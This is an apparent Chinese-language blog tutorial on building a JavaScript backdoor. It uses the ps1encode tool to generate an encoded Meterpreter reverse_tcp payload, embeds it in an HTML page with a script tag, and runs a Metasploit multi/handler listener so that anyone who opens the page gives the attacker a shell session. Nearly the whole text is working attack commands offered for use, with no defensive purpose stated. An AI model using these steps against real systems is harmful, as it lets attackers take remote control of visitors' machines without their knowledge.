JavaScript后门创建与使⽤

JavaScript后门创建与使⽤

前言

  今天介绍一种小众的js后门获取shell,使用ps1encode来加密反弹后门。

  工具地址:https://github.com/CroweCybersecurity/ps1encode

 

正文

  在文件目录下用下面的命令生成反弹shell的js代码,填入监听机的ip和port

./ps1encode.rb --LHOST [Port] --LPORT [Port] --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

  成功生成js代码

JavaScript后门创建与使⽤

   将上面加密后的js代码保存到一个.js的文件中

  通过js语法,将刚刚保存的js文件内嵌到html中

<script src="u.js"></script>

  此时在msf中开启监听

msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > set lhost 192.168.80.131
msf6 exploit(multi/handler) > run
  当访问带有js的html⽹⻚时,kali成功获取到会话 JavaScript后门创建与使⽤
上一篇:MSF流量加密躲避检测


下一篇:Metasploit(二)